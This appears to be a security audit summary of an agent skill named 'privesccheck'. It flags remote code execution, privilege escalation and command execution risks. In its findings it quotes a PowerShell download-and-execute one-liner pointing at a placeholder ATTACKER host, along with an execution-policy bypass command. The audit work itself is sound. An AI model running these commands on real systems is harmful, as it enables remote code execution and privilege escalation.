privesccheck
Warn
Audited by Gen Agent Trust Hub on Sep 15, 2026
Risk Level: MEDIUMREMOTE_CODE_EXECUTIONPRIVILEGE_ESCALATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill documents an in-memory delivery pattern using
IEX (New-Object Net.WebClient).DownloadString("http://ATTACKER/PrivescCheck.ps1")in bothSKILL.mdandreferences/ps-opsec-and-reporting.md. While this uses an explicit placeholder (ATTACKER), it provides a template pattern for downloading and executing arbitrary remote scripts directly in a PowerShell context. - [PRIVILEGE_ESCALATION]: The skill references techniques for bypassing Windows PowerShell script execution restrictions using the
powershell -ep bypasscommand pattern inSKILL.mdandreferences/ps-opsec-and-reporting.md. - [COMMAND_EXECUTION]: The skill details multiple command-line strings and automated workflows for Windows system enumeration, including service, task, and registry policy profiling via
Invoke-PrivescCheck.
Audit Metadata